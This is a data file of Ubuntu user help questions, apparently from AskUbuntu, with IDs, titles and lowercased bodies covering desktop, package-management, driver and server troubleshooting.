100367	how to switch and list windows ( possibly of the same application ) in unity ?	is there a way to switch easily between specific windows belonging to the same given application ? for example , open firefox , maximise the window ; then , open its history window ( history menu - > show all history ) , maximise it too . is there an easy way to switch between these two maximised firefox windows , without necessarily minimising the current window ( or other windows in front of the required window ) ? similarly , if i open another application alongside , how can i quickly go to the firefox window of my choice ? i have tried alt+tab , but when coming back from another application , which of the firefox windows i end up with seems indeterministic . under gnome , i would find the window i 'm looking for in the bottom bar . under osx , i would right-click on the application 's icon and choose the relevant window from the list . under windows 7 , i would click on the application icon and choose from the smaller windows . is there something similar that 's not activated or not visible by default in unity ? hovering my mouse until i 've found somewhere worth hovering over has n't been very successful so far . i would prefer a click-based solution , but solutions involving key short-cuts instead are welcome .
100374	apparmor reinstall fails	i use apparmor together with libapache2-mod-apparmor to sandbox some websites . however after a recent reinstall it stopped working . i keep getting this error : setting up apparmor ( 2.7.0~beta1+bzr1774-1ubuntu2 ) ... * starting apparmor profiles warning from stdin ( line 1 ) : /sbin/apparmor_parser : can not use or update cache , disable , or force-complain via stdin [ ok ] * reloading apparmor profiles warning from stdin ( line 1 ) : /sbin/apparmor_parser : can not use or update cache , disable , or force-complain via stdin invoke-rc.d : initscript apparmor , action `` reload '' failed . i tried to completely remove and purge apparmor , apache2 , libapache2-mod-apparmor etc , and then reinstall , but i keep getting this error . as far as i know there is nothing else on the system that could be preventing it . any ideas ?
100385	how can i fix a google earth 6.2 installation that went bad ?	i saw on a couple sites that there were instructions for installing google earth 6.2 , so i did it . the results were not good . now , every place i view is broken into rectangles of somewhat different colors , making it very difficult to use . it does this whether i zoom in or out , and no matter where on the planet i look . if i could completely remove google earth and reinstall it , i could give it another try , but i do n't know how to get it completely off my system . i even went into my home directory and found the .googleearth folder and deleted it and then tried reinstalling , but it 's always the same story . has anyone seen something like this before , and/or have a way to fix it ? thanks ! update i tried the instructions on webupd8 , which basicaly were just that there was an update . i downloaded the 64-bit deb from the google earth site , and double-clicked it . it opened the software center and said it would conflict , so i figured i should uninstall the previous version . when i then tried to install the new version , it seemed to go well , until i opened it and saw how it looked . so i thought perhaps i had not completely removed the prior version . i tried running sudo apt-get purge google-earth* googleearth* and then removing everything from /opt/google/earth/free , hoping to clear out any remnants that could interfere with a fresh install , but those have n't worked . i then followed some older instructions from webupd8 for installing google earth 6.1 by building a an installable deb with google-earth-package . i now have that older google earth working , but 6.2 is still on the computer , too , and is still looking really bad . update 2 output from recommended commands : ~ $ sudo dpkg -- list | grep earth [ sudo ] password for mdk : ii google-earth-stable 6.2.0.5905-r0 explore , search and discover the planet ii googleearth 6.0.3.2197+0.6.0-1 google earth , a 3d map/planet viewer ii googleearth-package 0.6.1 utility to automatically build a debian package of google earth of course , that 's after trying to get things working by reinstalling 6.0.3 . it shows they 're both still there . ~ $ sudo apt-get install -- reinstall google-earth reading package lists ... done building dependency tree reading state information ... done e : unable to locate package google-earth
100390	how to get unpublished kernel updates ?	http : //git.kernel.org/ ? p=linux/kernel/git/stable/linux-stable.git ; a=commitdiff ; h=652aa6a9ac4a5f8d3e1fa3f6466646519e83c01e the above link has the device ids of apple 's keyboards added to the kernel , which will allow for the use of the much needed fn key . is there anyway to force update the kernel with those patches , or create a custom kernel with those patches ? there does n't seem to be a release date , and i can barely understand that page as it is . ubuntu 11.10 kernel 3.0.0-15-generic
100397	will a spin off be recognized if it follows the branding guidelines ?	http : //design.ubuntu.com/audiences there are more than 3 options for example , we consider the desktop cd to be 50 % canonical , but the server cd to be 80 % canonical . your own ubuntu remix cdâs might be 100 % community . pick an appropriate position that reflects accurately how much of the work was done by the ubuntu community and how much by canonical . if your work is part of the official project and represents the trademark , include some element of canonical to indicate that . for example : an unofficial loco blog would be 100 % community , but the official ubuntu book would be 20 % canonical . according to the quote above , ubuntu will recognize any spin-off of it as long as its branding is appropriate , right ? if so , what does one do for his remix of ubuntu ( his current setup of the os ) to be recognized and distributed ?
100401	android 2.3.4 tablet u1 files client first login failure	i have installed ( then uninstalled/reinstalled ) the u1 files client app to my generic android 2.3.4 tablet . every time i try to launch the app and get to the login screen i get the error authentication failed : org.apache.http.client httpresponseexception : unauthorized i have tried to sync a photo from the gallery ( share via u1 ) as posted in another question in this forum to no avail . the u1 files client app works just fine on my htc evo , now i need it to work on my tablet . what workaround do i need to implement ?
100406	finding the tex live version	using the terminal in debian/ubuntu , how does find the version of the system 's tex live distribution ? i do n't have tlmgr so i would need to need to do this either through apt-get , aptitude , or some command that invokes the -- version flag . thanks .
100409	extra javaembeddedframe window when using jdownloader	i installed jdownloader in ubuntu 11.10 with gnome-shell . everthing works perfect , but when i 'm using jdownloader , it also creates an additional `` window '' called javaembeddedframe ( the app with the java logo without window in this , if you select it from the dash or from the alt+tab menăş it shows nothing . how can i remove that window ?
100411	how do i apply themes to gtk applications when i 'm using awesome wm ?	no matter what i use , e.g . gtk-ctheme , and the other apps availible in the repos , gtk applications running under awesome wm stay ugly . the same apps look fine when i use unity . any thoughts ?
100416	searching package repositories by contents	i am searching for a particular latex input file , and have not been able to find it in the repositories . i am fairly certain that the repositories can be searched by contents because the following command ( searching for the latex input file amsmath.sty ) is successful : # apt-cache search amsmath texlive-latex-base - tex live : basic latex packages texlive-doc-it - tex live : italian documentation texlive-latex-extra - tex live : latex supplementary packages texlive-math-extra - tex live : advanced math typesetting the particular tex input file i am searching for returns no results ( apt-cache search breqn ) . can i assume that breqn.sty is not present in any packages in the repositories , and thus seek it out through other means ( e.g. , ctan ) ? or might there be another way to search through package contents ?
100418	how do i move files from one user account to another on the same computer ?	i went into file system/home and tried to move files from one user account to another . it refused to move anything because it said i do not have permission . i am the administrator and both accounts are set that way .
100423	ubuntu wont login	i have ubuntu 11.10 installed ... for some unknown reason it wont log me in . entering the password returns me to the login screen immediately i googled for solution and applied the following and yet failed rm .xauthoruty chown -r sarvesh : sarvesh /home/sarves reinstalled xorg and lightdm . renamed sarvesh to sarvesh.old in hopes after restart it may come back up . nothing is helping ... logging in via virtual terminal and running ls /home/sarvesh says permission denied even after chown . after reinstalling lightdm , the interface looks weird low graphics like the one in xubuntu please help update managed to login but now my desktop lookis like this no unity launcher or my indicators
100424	how to remove `` frequently used programs '' from menu dash ?	how can i remove `` frequently used programs '' from the menu ?
100425	how can i remove the first dash of the menu ?	the first dash in the unity menu seems pointless to me . how can i remove it ?
100426	caps lock/ tab swap xmodmap errors	ubuntu 11.10 first off , i 'm completely new to linux , as in i just partitioned my computer two days ago and installed ubuntu . my tab key recently quit on me , and i would rather swap the caps lock and tab since they are in the same vicinity . i tried following this post ; how to swap/remap the caps lock key with tab key ? but i am unable to run xmodmap keycode 66 = tab iso_left_tab tab iso_left_tab xmodmap : unable to open file 'keycode ' for reading xmodmap : unable to open file '66 ' for reading xmodmap : unable to open file '= ' for reading xmodmap : unable to open file 'tab ' for reading xmodmap : unable to open file 'iso_left_tab ' for reading xmodmap : unable to open file 'tab ' for reading xmodmap : unable to open file 'iso_left_tab ' for reading xmodmap : 7 errors encountered , aborting . then when i tried to edit usr/bin/xmodmap , i get encoding errors in gedit . any help ? ?
100427	how to permanently unhide the application menu ?	why is the application menu appears only on `` mouse on '' ? how to disable autohide option for all programs ?
100431	configuration of eclipse ( c++ version ) for running sqlite ?	i need to run c++ code via eclipse which has sqlite . i can run it via terminal with typing g++ test.cpp -lsqlite3 . but how can i run it via eclipse ? how should pur the command `` -lsqlite3 '' in its configuration ? thanks this is the begging of the code # include < sqlite3.h > # include < stdlib.h > # include < string.h > // g++ test.cpp -lsqlite3
100433	telnet localhost , connection is refused	my localhost ( 127.0.0.1 ) is reachable by ping , and no problem with wget . but , when i try `` telnet local host '' or `` ftp localhost '' , connection is refused . how do i fix this problem ?
100434	manually copy software ( .deb files ) from apt-get archives from one machine to another causes fetch error	i copied the apt source directory from /var/cache/apt/archives/ on my laptop ( 11.10 ) to my work pc ( 11.10 ) . i then removed /var/lib/apt/lists/* . now when i try to update my pc from the terminal , it shows `` failed to fetch '' errors . if f use the ubuntu update manager to install updates , it says : `` waiting for unattended-upgrade to exit '' , but no update happens . now it wo n't update anything .
100444	can thunderbird send an out-of-office autoreply ?	i could n't find a way to configure out of office auto reply mechanism in thunderbird like there is in outlook . the only way i have found through searching online is to create a message filter but that needs the laptop and thunderbird to be running all the time , which is stupid in my view . please share if you know a way .
100449	how to configure the virtual machine settings in vmware 's vsphere client ?	i probably got a uncommon problem/question regarding virtualisation . i want to evaluate certain things of openstack framework . i got an esx-server where i have setup a ubuntu server 64 bit . i need virtualisation support to test virtualisation on this virtual server , but when i check ( grep -e 'vmx|svm ' /proc/cpuinfo ) i do n't find any of those cpu flags . does anybody know how to configure the virtual machine settings in vmware 's vsphere client to achieve virtualisation support in the virtual instance of ubuntu server ? or does anybody definitely know that this scenario is impossible ? i 'll be glad for any advice/hint to get this run or an answer to the question whether it 's possible ( source , arguments of opinion preferred ; ) )
100451	how do i recover my encrypted home directory	i opted to encrypt my home directory when installing ubuntu . i kept the recovery key , the passphrase ? . yesterday i changed my password with passwd . now i 've forgotten exactly how i spelled it and cant log in . i can chroot back into the machine , and change my password again , but how do i recover my home directory . so theres a wrapped/encrpyted copy of the passphrase using the user password . can i just make a new one and replace it ? thanks .
100454	something different with ati driver ?	i have ati radeon hd 4850 and use ati 12.11 driver on my ubuntu . i 've downloaded in amd official site but the performance reduce when i install it and the performance better before i install it . the installation was successfully and there 's no problem when installation . can you tell what 's wrong with ati driver ? compiz run , but so slowly when i move the window thanks masters : )
100455	openoffice calc - find out monthly growth based on yearly growth	i know there is a built-in function for that but ca n't remember what it is . let 's say i have a number , 10 , and over a period of a year that number has increased by 100 % to 20 . i would like to figure out what the monthly increase should be for 10 to reach 20 over 12 months . if i convert 100 % to a coefficient i get 2 . now by trying several numbers manually i figured the monthly coefficient should be around 1.065 : m. number coeff 1 10 1.065 2 10.65 1.065 3 11.34225 1.065 4 12.07949625 1.065 5 12.8646635063 1.065 6 13.7008666342 1.065 7 14.5914229654 1.065 8 15.5398654581 1.065 9 16.5499567129 1.065 10 17.6257038992 1.065 11 18.7713746527 1.065 12 19.9915140051 1.065 q : how can i obtain the monthly coefficient ( something around 1.065 ) from 2 and 12 ?
100457	help needed to choose the right version of ubuntu to install	i have planned to buy a laptop that comes with free dos . my question 's are : will ubuntu work on laptop 's ? if so can i install ubuntu that is there for download i.e. , ubuntu 11.10/ ubuntu10.04 lts . and second question is which version 32/64-bit should i download . here is that link for the laptop that i have planned to buy : http : //www.flipkart.com/computers/laptops/hp/itmdywe3t8zpzhxm ? pid=comdywd8ssbsxk9y please fell free to answer my query i 'm a novice at these things .
100463	'adobe-flashplugin conflicts with flashplugin-downloader ' error while trying to install adobe-flashplugin	i 'm having some hard time getting straight with my adobe flash plugin . $ sudo apt-get remove -- purge adobe-flashplugin flashplugin* nspluginwrapper reading package lists ... done building dependency tree reading state information ... done note , selecting 'flashplugin-installer ' for regex 'flashplugin*' note , selecting 'flashplugin-downloader ' for regex 'flashplugin*' note , selecting 'adobe-flashplugin ' for regex 'flashplugin*' note , selecting 'flashplugin-nonfree-extrasound ' for regex 'flashplugin*' note , selecting 'flashplugin ' for regex 'flashplugin*' note , selecting 'flashplugin-nonfree ' for regex 'flashplugin*' note , selecting 'adobe-flashplugin ' instead of 'flashplugin-nonfree' package nspluginwrapper is not installed , so not removed package flashplugin-installer is not installed , so not removed package adobe-flashplugin is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : adobe-flash-properties-gtk : depends : adobe-flashplugin ( = 11.1.102.55-0oneiric1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ sudo apt-get install -- reinstall adobe-flashplugin reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : adobe-flashplugin 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/6â 709 kb of archives . after this operation , 19,0 mb of additional disk space will be used . dpkg : regarding ... /adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb containing adobe-flashplugin : adobe-flashplugin conflicts with flashplugin-downloader flashplugin-downloader : i386 ( version 11.1.102.55ubuntu0.11.10.1 ) is present and installed . dpkg : error processing /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb ( -- unpack ) : conflicting packages - not installing adobe-flashplugin errors were encountered while processing : /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : sudo apt-get remove flashplugin-downloader reading package lists ... done building dependency tree reading state information ... done virtual packages like 'flashplugin-downloader ' ca n't be removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : adobe-flash-properties-gtk : depends : adobe-flashplugin ( = 11.1.102.55-0oneiric1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . edit # 2 : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : adobe-flashplugin the following new packages will be installed : adobe-flashplugin 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/6â 709 kb of archives . after this operation , 19,0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : regarding ... /adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb containing adobe-flashplugin : adobe-flashplugin conflicts with flashplugin-downloader flashplugin-downloader : i386 ( version 11.1.102.55ubuntu0.11.10.1 ) is present and installed . dpkg : error processing /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb ( -- unpack ) : conflicting packages - not installing adobe-flashplugin errors were encountered while processing : /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) output of sudo apt-get update - https : //gist.github.com/1716225 ... w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/oneiric/main/source/sources 404 not found ... i 'm using ubuntu 11.10 any thoughts ?
100465	on screen resolution-	how do i get the screen resolution down to where i can set the screen resolution and click the apply icon ? i ca n't get the screen resolution page to move up and down to click the icon that is under the bottom bar at the bottom of the screen to click it !
100471	alt+ctrl+t no longer opens a terminal	i have a problem with keyboard shortcuts such as alt+ctrl+t and alt+ctrl+backspace . they do n't work anymore . i have logged out , logged in , rebooted , powered off completely , and restarted compiz several times . but ctrl+alt+t does not open a terminal or anything else . can anyone suggest a fix or what i should look at ?
100478	notify-send only works as root ( via sudo )	i have notify-send and all the requirments installed , but when i run a simple command notify-send `` test '' `` test message '' nothing happens , but if i run the same command through sudo , it works . system processes can send notifications with no problem , so i see a popup when i join a new wireless lan , for example . what group do i need to be a member of in order to send notifications ?
100479	ati 5470 problem with compiz effects . after reboot blackened parts of screen ( bottom and right )	im using 10.04 version of ubuntu distro . i was planning to completely migrate from other os to ubuntu , but a problem has occured . after installing ubuntu i was happy with it since new video card drivers from ati has been realesed and it worked quite well for a week . all effects just worked fine . but today after restart i 've logged and some strange things happened . the bottom and right parts of the screen was completely blackened . looked like resolution change.after that ive looked into my aticcc for display settings it was the same 1366x768 with a look of like ~1200x600 . after that searched the forums and found that if i change my effects to none in appearance menu it should back to normal . and yes it worked . but i want my effects with normal screen resolution back . note that everything worked fine just before this morning . xorg.conf file was also with that resolution i need
100480	java location in ubuntu using which java	i 've installed java in ubuntu and generally it seems to be ok , but now i 'm trying to upgrade to openjdk 7 and finding problems . when i do which java i get the following ... epic @ ubuntu : ~/git/game-of-life $ which java /usr/bin/java epic @ ubuntu : ~/git/game-of-life $ cd usr/bin/java bash : cd : usr/bin/java : no such file or directory epic @ ubuntu : ~/git/game-of-life $ when i do java -version it tells me it 's epic @ ubuntu : ~/git/game-of-life $ java -version java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre11-0ubuntu1.11.10.1 ) openjdk client vm ( build 20.0-b11 , mixed mode , sharing ) epic @ ubuntu : ~/git/game-of-life $ if i look in the ubuntu software center , it thinks both 6 and 7 openjdk are installed , any ideas ? edit : just realised i added.. export m2_home=/usr/local/apache-maven/apache-maven-3.0.3 export m2= $ m2_home/bin export path= $ m2 : $ path export java_home=/usr/local/jdk1.6.25 to my .bashrc - should i keep doing it this way or would it be bad practice to link like this ? thanks ,
100482	adding shell access to existing users in zentyal	i user ldap to create my user accounts . for every user created a home directory is created for every user created i have updated my configuration to adding a default shell . but i did this change post creating some users . for all existing users they are unable to login to server using ssh , as they dont have a default shell set . for all new users they were as the shell was set . how to fix so that existing users can access the shell .
100483	how to completely remove ldap and remove the directory tree	so i followed this guide : https : //help.ubuntu.com/11.04/serverguide/c/openldap-server.html to install and configure ldap but then i discoverd both phpldapadmin and luma and have decided to rebuild my tree from scratch using one of those tools . however im not sure how to completely remove ldap now . i can remove it using apt-get , but if i attempt to reinstall it and login using phpldapadmin it seems that it 's still looking for older authentication and gives me a credential error
100484	how to set wifi max connection tries ?	i have a wifi network configured within networkmanager . unfortunately i can not use this as long as i sit on my workplace as there is the signal is very low . but when i go over to other workplaces of colleagues it will nearly work . the ssid , however , is visible at my workplace and ubuntu tries to connect again and again . i wo n't disable wifi since , i will forget to reenable when i move to other places . neither i want to delete the network as i will use it on other places at work . so how do i overcome this annoying connection failure dialogs for that network ? is there a maximum number of connection tries i could decrease ? i use 11.10 . thanks for your suggestions .
100485	screen scrambled after update with intel gma hd graphics	today my laptop froze after it waking up . i rebooted my laptop , saw the grub screen , hit enter , and then everything got scrambled as seen below : this scrambling is not confined to the splash screen . it persists after logging in . i restarted and booted windows 7 without issues . this leads me to believe that the cause is some funky driver update . has anyone else experienced this ? i 've tried running 'dpkg-reconfigure -phigh xserver-xorg ' from the command line . i 've also purged the xserver-xorg package and resinstalled it . any ideas ? can i maybe roll back the driver to a previous version ( assuming that is the case ) ? if so what package contains the intel graphics drivers ?
100487	how can i report a bug for two packages ?	how can i make reports to several packages such as unity-2d and thunderbird for a bug with using thunderbird in unity 2d ? when i type ubuntu-bug-report < package > it only lets me type in one !
100489	how to set up a broadband connection	i have a bsnl broadband connection . i do n't see any settings for broadband in ubuntu , and i ca n't just connect automatically -- `` wired connections '' shows no connection . i see an option for mobile settings , but that does n't work for this case . where do i need to look to get the broadband connection to work ?
100493	import gmail contacts into thunderbird via ubuntu one ?	i 've just started using ubuntu one . it tells me i can import my gmail contacts . how can i do that ?
100497	how to get new windows and notifications to appear in current workspace .	i have not yet found a question like this , and that surprises me . i have ubuntu 11.04 with compiz and gnome 2.x what i would love to have is for applications to open on the workspace that i 'm in on the moment i click on their icon . usually what happens is that you click on an application , you will get a `` starting application '' in your task bar , and then the application will open in whatever workspace you 're in . so a typical example is that i 'm in my programming in my ide , and i hit the debug button , and switch to another workspace to check my mails while my application is compiling . when it is done , i want it to spawn a window in the original workspace , and not in front of my mail client , so that i have to move it back up ( seems like a waste of time + it 's annoying ) same thing for applications that spawn new windows : it should open in the same workspace as the application that spawns it . this is n't about opening specific applications in specific workspaces , because i do n't want to configure this for each of my applications . i want a global solution . any help ? this has been bugging me about ubuntu in general for years now .
100498	apt-get update bzip2 errors	i installed ubuntu 11.10 today on my lenovo w500 . after that when i tried running sudo apt-get update this is the error i am getting . get:117 http : //ftp.jaist.ac.jp oneiric-security/universe translationindex [ 73 b ] 99 % [ 48 sources bzip2 0 b ] [ 22 sources bzip2 5,294 kb ] 1,983 kb/s 0s bzip2 : compressed file ends unexpectedly ; perhaps it is corrupted ? *possible* reason follows . bzip2 : inappropriate ioctl for device input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . i found the following similar question : errors while updating ubuntu 11.10 , but the solutions mentioned ( changing the download server , running apt-get clean , apt-get autoclean ) and have also tried removing the /var/cache/apt/archives/lists direcotry . as a result of this , i am unable to install any new packages .
100500	any application on android to sync-up with ubuntu one notes ?	i 've already tried tomdroid ( only read access ) , chalk ( new notes unable to upload ) , remember the milk ( but it does n't link with ubuntu one ) , ubuntu one files ( but it does n't sync notes ) . as you 're aware now , nothing has helped me in getting a working read-write access to ubuntu one . any ideas ?
100503	how are packages suggested and what is the difference between extra and new packages ?	when installing a new package via `` apt-get install '' , i usually just tick yes if it is a program i need/want , but , i read through it , and , i am a little curious as to what the sections actually mean . 1 ) how does apt-get know what packages are `` suggested '' ? 2 ) what is the difference between `` the following extra packages will be installed '' and `` the following new packages will be installed '' ?
100505	how to get the java compiler for ubuntu ?	i am in a java class in my college right now , and we have to be able to compile java programs via the terminal . i would like to keep using my ubuntu installation for it though . whenever i try to compile something on ubuntu , nobody can read the program . says something about it not being able to read the program . i have installed the `` openjdk-7-jdk '' program , which might be the issue . any help is appreciated , thanks ! on a side note , i would like to mention that i need to compile my programs on os x lion or windows 7 in order to run them correctly ...
100509	how to type in indic language from english us keyboard	i opened libreoffice 3.0 ( ubuntu 11.10 ) and selected lohit hindi font in the fonts selection column . downloaded the charachter map of english and hindi keys as given here http : //docs.redhat.com/docs/en-us/red_hat_enterprise_linux/5/html-single/international_language_support_guide/images/hindi.png but when i am typing in hindi with my english keyboard there is no hindi word i still the english letters typed as '' kerasadsd '' .which should not happen since lohit hindi font is selected so i expected the correcponding key mapped hindi characters to appear . what mistake did i do in above ? i have us english keyboard only and i am using the same to type in hindi .
100510	is there any gui for server management for ubuntu which is not web based ?	i 'm very comfortable using the command line and i run ubuntu server on my own home server . though i feel that ubuntu server really lacks the ease of use and friendliness that the windows server 2008 provide . do n't take me wrong , i do understand the reasons to why there is no default gui for ubuntu server and i do n't think it needs one either . but for users who simply want to put up a home server it might be helpful to manage it all from a simple interface . it 's also much easier to get a complete overview from a graphical shell . would n't it be great for unexperienced users to just get a `` server manager '' ( with no extra setup to get a web server and a web interface up and running ) where he/she can install/remove , start/stop services by just enabling a switch ? there is a lot of web interfaces available but no native interface . what is the reasoning behind that this has never been implemented ? has it been proposed before ? i 've just played around with the idea in my head for a while , how the gui should look and if you could implement `` charms '' to install services locally and stuff like that . please be kind and try to enlighten me and not just flame this idea : )
100520	how to optionally maximize so that the launcher wo n't get hidden ?	firstly , i very much like it when the launcher autohides when i really need all the screen space . the problem is , there are a lot of workflows when i want a large app screen , but the launcher should remain visible . i have found i spend a lot of time maximizing terminals and browser windows by hand , by resizing them to take almost all of the screen . this is annoying . you can toggle the behavior of the launcher from the settings , but what i really want is to have two possible maximize actions : maximize up to the launcher , and maximize to fill the screen . is there any way to be able to have both available at the same time ?
100521	radeon 9200 and unity problems after adding xorg-edgers ppa	i though that doing : sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get upgrade it will fix my really slow interface using unity in oneiric ... now , where i found this `` solution '' , says that if something goes wrong i would have to put : sudo ppa-purge xorg-edgers but after that console says sudo : ppa-purge : command not found and if i have no solution for this , what would you recommend me to use for a faster interface ?
100524	search all my thunderbird address books ?	i have a bunch of different thunderbird address books set up , and i 'd like an interface ( i 'll take something command line ) that lets me search them all . currently , if i see that something is prompting me to use an old addy in my auto complete , i have to open my contacts and search each address book separately to find the offending bad address . i 'd love to search them all in one pass .
100527	how to fix webcam on macbook pro 5,5	i 'm running ubuntu 10.04 on a macbook pro 5.5 . when i initially installed , the webcam worked perfectly , and i could use cheese to take photos or video without any problems . however , now when i open cheese , it will either freeze when i open it , or show the error `` can not connect to video device ( /dev/video0 ) '' . i 've tried camorama and fswebcam , but they give me the same error . rebooting and trying different kernels has n't fixed it . what else can i do to diagnose or fix this ? edit : i reformatted and installed ubuntu 11.10 , but the issue persists . the webcam will work fine one moment , and then apps like cheese will give me the error `` no device found '' . edit : this is a known bug .
100528	sharing printer with cups	i 'm on ubuntu server 10.10 and i need to connect a hp laserjet printer via usb and share it to the lan . i followed some tutorial on the internet to install the hplip drivers and configuring cups . i have access to the web interface of the server and printing the test page works like a charm . i can also edit all the default printer options , viewing the queue and so on . the only thing that i ca n't do is installing and find the printer from other clients on same the lan . i tried it with windows 7 's default searching and nothing appears , i tried to install a new tcp/ip port with the server 's ip address and add the printer 's driver manually but did n't work either . what i have to do or check to get this to work ? the only problem is that the printer is n't visible on the lan but it 's correctly installed on the ubuntu server .
100529	how to install python package pyzmq properly ?	how to install python paackage pyzmq properly ? i searched in synapic package manager in vain .
100530	using a custom list for autocompletion ( e.g. , a list of files )	what i would like to do is when i write inside on console a command , for example . ls file1.txt folder1 folder2 then i write cd ( i hit some magic shortcut and i can access using down button first file1.text . when i click it again i see `` cd folder1 '' when i hit it again i see `` cd folder2 '' . is it possible ? i do know there is auto-complete with tab , but that is not what i want .
100535	problem connecting to android wireless tether	i have two different mobile phones from t-mobile , a g2x and a defy . both are set up for wireless tethering . i have two machines running ubuntu 11.10 , an hp netbook and an older dell notebook . they will both connect to the signal from the g2x without any problem , but neither of them will connect to the defy . it shows the defy in my available networks , but when i try to connect it just runs and runs without connecting . i also have three other windows machines here in my home and they are able to connect to the defy without any problem . is there a setting i can change or a command i have to run ?
100539	seemingly uncurable package install failure	similar to how-to-get-dpkg-working-again my daily apt-get has had this error , completely failing to update anything : root @ chopin~ wed feb 01,16:23:56 # ( 5473 ) apt-get -y install reading package lists ... done building dependency tree ... 50 % building dependency tree reading state information ... done the following extra packages will be installed : python-twisted-core suggested packages : python-qt3 python-profiler the following packages will be upgraded : python-twisted-core 1 upgraded , 0 newly installed , 0 to remove and 82 not upgraded . 1 not fully installed or removed . need to get 0 b/1,129 kb of archives . after this operation , 8,360 kb of additional disk space will be used . ( reading database ... dpkg : warning : files list file for package `python-twisted-core ' missing , assuming package has no files currently installed . ( reading database ... 277181 files and directories currently installed . ) preparing to replace python-twisted-core 10.2.0-1 ( using ... /python-twisted-core_10.2.0-1_all.deb ) ... unpacking replacement python-twisted-core ... dpkg : ../../src/archives.c:968 : tarobject : assertion `r == stab.st_size ' failed . localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 0 kib n : ignoring file 'apt-build ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension e : sub-process /usr/bin/dpkg exited unexpectedly have experienced this horrific show-stopper across three servers on and off for two years , using ubuntu 10.04 , 10.10 , and 11.04 32bit systems . all manner of troubleshooting with launchpad.net has only gone in circles . i do not use ntfs but ext4 . apt-get purge fails , dpkg -- configure -a exits instantly with no output , blaming python-twisted-core seemed to go nowhere . i may be on to something . the next wave of auto-updates break it again though . root @ chopin/var/lib/dpkg/info thu feb 02,15:03:39 # ( 5743 ) **dpkg -- remove -- force-remove-reinstreq python-twisted-core** dpkg : warning : overriding problem because -- force enabled : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . ( reading database ... dpkg : warning : files list file for package `python-twisted-core ' missing , assuming package has no files currently installed . ( reading database ... 277171 files and directories currently installed . ) removing python-twisted-core ... root @ chopin/var/lib/dpkg/info thu feb 02,15:03:54 # ( 5744 ) **apt-get install geany debsums -y** reading package lists ... done building dependency tree reading state information ... done suggested packages : geany-plugins the following new packages will be installed : debsums geany 0 upgraded , 2 newly installed , 0 to remove and 86 not upgraded . need to get 0 b/2,756 kb of archives . after this operation , 8,016 kb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package debsums . ( reading database ... 277175 files and directories currently installed . ) unpacking debsums ( from ... /debsums_2.0.48+nmu3_all.deb ) ... selecting previously deselected package geany . unpacking geany ( from ... /geany_0.20-0ubuntu2_i386.deb ) ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for hicolor-icon-theme ... processing triggers for doc-base ... processing 1 added doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for menu ... processing triggers for python-support ... setting up debsums ( 2.0.48+nmu3 ) ... creating config file /etc/apt/apt.conf.d/90debsums with new version setting up geany ( 0.20-0ubuntu2 ) ... processing triggers for menu ... localepurge : disk space freed in /usr/share/locale : 2660 kib localepurge : disk space freed in /usr/share/man : 72 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 2732 kib n : ignoring file 'apt-build ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension root @ chopin/var/lib/dpkg/info thu feb 02,15:04:55 # ( 5744 ) **time debsums_init & **
100550	how can i access ubuntu server running in a vm via the internet ?	i am running ubuntu server 10.04 on a virtualbox virtual machine from a windows 7 host . how do i open access to this guest virtual machine from the internet ?
100551	how can i see the ip addresses which are connected to a switch ?	i 'm connected to a switch like my others business ' computers . how can i get these ip addresses ? of course , the switch is connected to a router and this to a modem ...
100557	spacebar not launching application / open file	i remember on ubuntu 10.04 you could mark a file , lets say a picture and then hit the space key , this would open the picture . i think after ubuntu 10.10 this does n't work . how can i make again the space to work as enter ?
100558	battery icon with problem with some themes	i 'm using the elementary icon theme from their ppa , it 's great , but have some problems . in almost all cases i fix it without any problem , but i ca n't solve this one . the battery icon is `` missing '' and it show and ugly battery icon , i do n't have sure from where it came and how to change it . does anyone have any information that can help me to fix it ? i already tried to change the name of the file , copy from other themes , make inherent themes too , and nothing solve it . ps . : already `` googled '' it , but just found some people with problems like `` missing icon '' or something like that .
